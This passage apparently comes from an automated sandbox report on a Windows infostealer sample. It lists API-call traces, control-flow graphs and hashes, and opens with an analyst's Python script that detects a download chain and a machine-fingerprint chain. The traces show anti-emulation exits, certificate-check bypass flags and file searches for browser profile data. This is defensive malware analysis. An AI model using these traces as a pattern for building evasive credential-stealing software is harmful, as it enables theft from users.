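    idx = find_chain(calls, ("GetVolumeInformationA", "wsprintfA"))
    if idx is None:
        return None
    heap = any(x.api == "RtlAllocateHeap" for x in calls[idx[0]:idx[1]])
    return {"volume_serial_formatted": True, "heap_buffer": heap}

def scan(records):
    hits = {}
    for func, text in records.items():
        calls = parse_apis(text)
        for name, decoder in (("wininet_download", decode_download),
                              ("volume_serial_fingerprint", decode_fingerprint)):
            result = decoder(calls)
            if result:
                hits.setdefault(func, {})[name] = result
    return hits
```

Running scan(SAMPLE_RECORDS) attributes the WinINet chain to 00706C40 (direct access, HTTP service, verb GET, status-code query, 0x7CF-byte reads, and, under the stated assumption, security flags that ignore an unknown CA, wrong key usage and a weak signature) and the volume-serial chain to 00722740. find_chain matches in order but not adjacently, so the lstrcpy and StrCmpCA calls interleaved in the real listing do not break the match.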
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                          • String ID: :\$C
                          • API String ID: 2572753744-3309953409
                          • Opcode ID: a9a37976e7106338b731ed07bd5e9656786cc20a2b500028726260ce8cba52fa
                          • Instruction ID: 1332054a9ea2f954027291a8a96504921de127e67fcb6e97fd2bf3fdc86333f0
                          • Opcode Fuzzy Hash: a9a37976e7106338b731ed07bd5e9656786cc20a2b500028726260ce8cba52fa
                          • Instruction Fuzzy Hash: BF319EB1D08259ABCB14CFB89985AEFFFBCEF58700F10016AE505F7250E2348B418BA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2793 704bc0-704bce 2794 704bd0-704bd5 2793->2794 2794->2794 2795 704bd7-704c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 702a20 2794->2795
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00704BF7
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00704C01
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00704C0B
                          • lstrlen.KERNEL32(?,00000000,?), ref: 00704C1F
                          • InternetCrackUrlA.WININET(?,00000000), ref: 00704C27
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ??2@$CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1683549937-4251816714
                          • Opcode ID: 6edd1c90a8b0f40ff17839642fe9944dcc6b725c5604629b64e4e6c88ee2cace
                          • Instruction ID: 4accf11453684745f720c91f5942fd9ff4b05eba2229eea8ad8ac59ad02e6f4d
                          • Opcode Fuzzy Hash: 6edd1c90a8b0f40ff17839642fe9944dcc6b725c5604629b64e4e6c88ee2cace
                          • Instruction Fuzzy Hash: BA012D71D00218ABDB10DFA8EC49B9EBBF8EB08320F008126F914E7390EB7459058FD4

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2798 701030-701055 GetCurrentProcess VirtualAllocExNuma 2799 701057-701058 ExitProcess 2798->2799 2800 70105e-70107b VirtualAlloc 2798->2800 2801 701082-701088 2800->2801 2802 70107d-701080 2800->2802 2803 7010b1-7010b6 2801->2803 2804 70108a-7010ab VirtualFree 2801->2804 2802->2801 2804->2803
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00701046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 0070104D
                          • ExitProcess.KERNEL32 ref: 00701058
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0070106C
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 007010AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                          • String ID:
                          • API String ID: 3477276466-0
                          • Opcode ID: 9f3ca192f493381c58a290f8f7e2790b06b41c58c7bbc4afca76b97ad346bc31
                          • Instruction ID: ecf129e08f5cf03aff4ec7ea0a6179ae0e642d427d5fc998df312bc90ee2b659
                          • Opcode Fuzzy Hash: 9f3ca192f493381c58a290f8f7e2790b06b41c58c7bbc4afca76b97ad346bc31
                          • Instruction Fuzzy Hash: 0501F471748304BBE7244B656C5AF6B77EDE785B05F208414F744E72C0D9B5EA009A64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2805 71ee90-71eeb5 call 702930 2808 71eeb7-71eebf 2805->2808 2809 71eec9-71eecd call 706c40 2805->2809 2808->2809 2810 71eec1-71eec3 lstrcpy 2808->2810 2812 71eed2-71eee8 StrCmpCA 2809->2812 2810->2809 2813 71ef11-71ef18 call 702a20 2812->2813 2814 71eeea-71ef02 call 702a20 call 702930 2812->2814 2819 71ef20-71ef28 2813->2819 2824 71ef45-71efa0 call 702a20 * 10 2814->2824 2825 71ef04-71ef0c 2814->2825 2819->2819 2821 71ef2a-71ef37 call 702930 2819->2821 2821->2824 2830 71ef39 2821->2830 2825->2824 2826 71ef0e-71ef0f 2825->2826 2829 71ef3e-71ef3f lstrcpy 2826->2829 2829->2824 2830->2829
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071EEC3
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0071EEDE
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0071EF3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: ERROR
                          • API String ID: 3722407311-2861137601
                          • Opcode ID: 66670da43b94bdb883cc18d7c5274a5a91be78385bddc6958e2c9a9215c0a758
                          • Instruction ID: b20fd16b02f523e9ec46b0ee91deb06ef710aa2b2e138d78e1c5d8b0a75459df
                          • Opcode Fuzzy Hash: 66670da43b94bdb883cc18d7c5274a5a91be78385bddc6958e2c9a9215c0a758
                          • Instruction Fuzzy Hash: BB21F171724106DBDB65BF7CD84DA9A37E4AF10300F049524BC4AEB293DE38E8568B90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2886 7010c0-7010cb 2887 7010d0-7010dc 2886->2887 2889 7010de-7010f3 GlobalMemoryStatusEx 2887->2889 2890 701112-701114 ExitProcess 2889->2890 2891 7010f5-701106 2889->2891 2892 701108 2891->2892 2893 70111a-70111d 2891->2893 2892->2890 2894 70110a-701110 2892->2894 2894->2890 2894->2893
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: ed99f43ce1604b441d8d128223b1aff541fb1c6eabda80c3e50e95e17bb8838f
                          • Instruction ID: bd8f084c0582d831056c76b229bef9bb0fd27a18cdc292611006f8eb518aa844
                          • Opcode Fuzzy Hash: ed99f43ce1604b441d8d128223b1aff541fb1c6eabda80c3e50e95e17bb8838f
                          • Instruction Fuzzy Hash: DAF0A770118249DBEB186B64D84A72DF7D8EB01350F904B29EEDAC32D1F678C8409567

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2895 718c88-718cc4 StrCmpCA 2898 718cc6-718cc7 ExitProcess 2895->2898 2899 718ccd-718ce6 2895->2899 2901 718ee2-718eef call 702a20 2899->2901 2902 718cec-718cf1 2899->2902 2903 718cf6-718cf9 2902->2903 2905 718ec3-718edc 2903->2905 2906 718cff 2903->2906 2905->2901 2946 718cf3 2905->2946 2908 718d30-718d3f lstrlen 2906->2908 2909 718e56-718e64 StrCmpCA 2906->2909 2910 718d5a-718d69 lstrlen 2906->2910 2911 718dbd-718dcb StrCmpCA 2906->2911 2912 718ddd-718deb StrCmpCA 2906->2912 2913 718dfd-718e0b StrCmpCA 2906->2913 2914 718e1d-718e2b StrCmpCA 2906->2914 2915 718e3d-718e4b StrCmpCA 2906->2915 2916 718d84-718d92 StrCmpCA 2906->2916 2917 718da4-718db8 StrCmpCA 2906->2917 2918 718d06-718d15 lstrlen 2906->2918 2919 718e88-718e9a lstrlen 2906->2919 2920 718e6f-718e7d StrCmpCA 2906->2920 2933 718d41-718d46 call 702a20 2908->2933 2934 718d49-718d55 call 702930 2908->2934 2909->2905 2929 718e66-718e6d 2909->2929 2935 718d73-718d7f call 702930 2910->2935 2936 718d6b-718d70 call 702a20 2910->2936 2911->2905 2922 718dd1-718dd8 2911->2922 2912->2905 2923 718df1-718df8 2912->2923 2913->2905 2924 718e11-718e18 2913->2924 2914->2905 2925 718e31-718e38 2914->2925 2915->2905 2926 718e4d-718e54 2915->2926 2916->2905 2921 718d98-718d9f 2916->2921 2917->2905 2927 718d17-718d1c call 702a20 2918->2927 2928 718d1f-718d2b call 702930 2918->2928 2931 718ea4-718eb0 call 702930 2919->2931 2932 718e9c-718ea1 call 702a20 2919->2932 2920->2905 2930 718e7f-718e86 2920->2930 2921->2905 2922->2905 2923->2905 2924->2905 2925->2905 2926->2905 2927->2928 2955 718eb3-718eb5 2928->2955 2929->2905 2930->2905 2931->2955 2932->2931 2933->2934 2934->2955 2935->2955 2936->2935 2946->2903 2955->2905 2956 718eb7-718eb9 2955->2956 2956->2905 2957 718ebb-718ebd lstrcpy 2956->2957 2957->2905
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 93d28647fec71990aa09d459c36e29ef73f89611a59f49dfcdb59ddb8c8d294c
                          • Instruction ID: d4ede9a0e848390550b2684b9365ac24bb5ef0d7e99276af7232584228e1d135
                          • Opcode Fuzzy Hash: 93d28647fec71990aa09d459c36e29ef73f89611a59f49dfcdb59ddb8c8d294c
                          • Instruction Fuzzy Hash: D0E0D864514245F7DB145BB9CC489867F68AF54714B04806CE9046F151DB69EC03C7E5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2958 722ad0-722b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 722b44-722b59 2958->2959 2960 722b24-722b36 2958->2960
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00722AFF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00722B06
                          • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00722B1A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: f5b7c110163e9dea7b603178c210d8abe5e15545e76ac6d567f8c58b88302484
                          • Instruction ID: b9b4bca30c6ff8b493affd65d086f8faedcf9739a824b12090933636c1534825
                          • Opcode Fuzzy Hash: f5b7c110163e9dea7b603178c210d8abe5e15545e76ac6d567f8c58b88302484
                          • Instruction Fuzzy Hash: F40126B2A48218ABC700CF98EC45B9DF7B8F704B21F00022AF905D3780D3781900CBA1
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00701046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 0070104D
                          • ExitProcess.KERNEL32 ref: 00701058
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: e2dcffd89ba64ae60679703cd6540fa592bee2f001fdc78ac9385a179b0f8052
                          • Instruction ID: d7d34c1d5cfba4ed874a70d89d93c57f0ee68926b605f59b571f0380a0a8c9a4
                          • Opcode Fuzzy Hash: e2dcffd89ba64ae60679703cd6540fa592bee2f001fdc78ac9385a179b0f8052
                          • Instruction Fuzzy Hash: B2E012B079C355BAEA2517619C0EF163A6D9752B11F404101B345EA1E1F5EDB500B978
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007123D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007123F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00712402
                          • lstrlen.KERNEL32(\*.*), ref: 0071240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 00712436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00712486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: 95f232e15572dacb72b80b4633fdea594948b0e5734de099ecab2aac94423661
                          • Instruction ID: 36779b01d27928f077996210b79837fc7f197a3e8801a1c71420474069edddce
                          • Opcode Fuzzy Hash: 95f232e15572dacb72b80b4633fdea594948b0e5734de099ecab2aac94423661
                          • Instruction Fuzzy Hash: 10A27F71A25616DBDB21AFBCDC8CAAE77F9AF04700F044124B805A7292DB7CDD469F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007016E2
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00701719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070176C
                          • lstrcat.KERNEL32(00000000), ref: 00701776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007017A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007017EF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007017F9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701825
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701875
                          • lstrcat.KERNEL32(00000000), ref: 0070187F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007018AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 007018F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007018FE
                          • lstrlen.KERNEL32(00731794), ref: 00701909
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701929
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00701935
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070195B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701966
                          • lstrlen.KERNEL32(\*.*), ref: 00701971
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070198E
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 0070199A
                            • Part of subcall function 00724040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0072406D
                            • Part of subcall function 00724040: lstrcpy.KERNEL32(00000000,?), ref: 007240A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007019C3
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701A0E
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701A16
                          • lstrlen.KERNEL32(00731794), ref: 00701A21
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701A41
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00701A4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701A76
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701A81
                          • lstrlen.KERNEL32(00731794), ref: 00701A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701AAC
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00701AB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701ADE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701AE9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701B11
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00701B45
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 00701B70
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 00701B8A
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00701BC4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701BFB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701C03
                          • lstrlen.KERNEL32(00731794), ref: 00701C0E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701C31
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00701C3D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701C69
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701C74
                          • lstrlen.KERNEL32(00731794), ref: 00701C7F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701CA2
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00701CAE
                          • lstrlen.KERNEL32(?), ref: 00701CBB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701CDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00701CE9
                          • lstrlen.KERNEL32(00731794), ref: 00701CF4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701D14
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00701D20
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701D46
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701D51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701D7D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701DE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701DEB
                          • lstrlen.KERNEL32(00731794), ref: 00701DF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701E19
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00701E25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701E4B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701E56
                          • lstrlen.KERNEL32(00731794), ref: 00701E61
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701E81
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00701E8D
                          • lstrlen.KERNEL32(?), ref: 00701E9A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701EBA
                          • lstrcat.KERNEL32(00000000,?), ref: 00701EC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701EF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701F3E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00701F45
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00701F9F
                          • lstrlen.KERNEL32(010D89A0), ref: 00701FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00701FE3
                          • lstrlen.KERNEL32(00731794), ref: 00701FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070200E
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00702042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070204D
                          • lstrlen.KERNEL32(00731794), ref: 00702058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00702075
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00702081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                          • String ID: \*.*
                          • API String ID: 4127656590-1173974218
                          • Opcode ID: cd8acce63523a7dd7598976b679417803121d8942d841a050e831024f2e60d9d
                          • Instruction ID: e0a58f02e6b9239a1d5dc0ad98144747563be8dad39159462e7bcf43d43216df
                          • Opcode Fuzzy Hash: cd8acce63523a7dd7598976b679417803121d8942d841a050e831024f2e60d9d
                          • Instruction Fuzzy Hash: FC925472A15216DBCB21EFA4DD8CAAE77F9AF44700F444224F805B7292DB78DD069F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070DBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DBEF
                          • lstrlen.KERNEL32(00734CA8), ref: 0070DBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DC17
                          • lstrcat.KERNEL32(00000000,00734CA8), ref: 0070DC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DC4C
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070DC8F
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070DCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0070DCD0
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0070DCF0
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 0070DD0A
                          • lstrlen.KERNEL32(0072CFEC), ref: 0070DD1D
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070DD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DD7B
                          • lstrlen.KERNEL32(00731794), ref: 0070DD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DDA3
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070DDAF
                          • lstrlen.KERNEL32(?), ref: 0070DDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 0070DDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DE19
                          • lstrlen.KERNEL32(00731794), ref: 0070DE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070DE6F
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070DE7B
                          • lstrlen.KERNEL32(010D8B70), ref: 0070DE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DEBB
                          • lstrlen.KERNEL32(00731794), ref: 0070DEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070DEE6
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070DEF2
                          • lstrlen.KERNEL32(010D8830), ref: 0070DF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DFA5
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070DFB1
                          • lstrlen.KERNEL32(010D8B70), ref: 0070DFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DFF4
                          • lstrlen.KERNEL32(00731794), ref: 0070DFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E022
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070E02E
                          • lstrlen.KERNEL32(010D8830), ref: 0070E03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070E06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 0070E0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0070E0E7
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070E11F
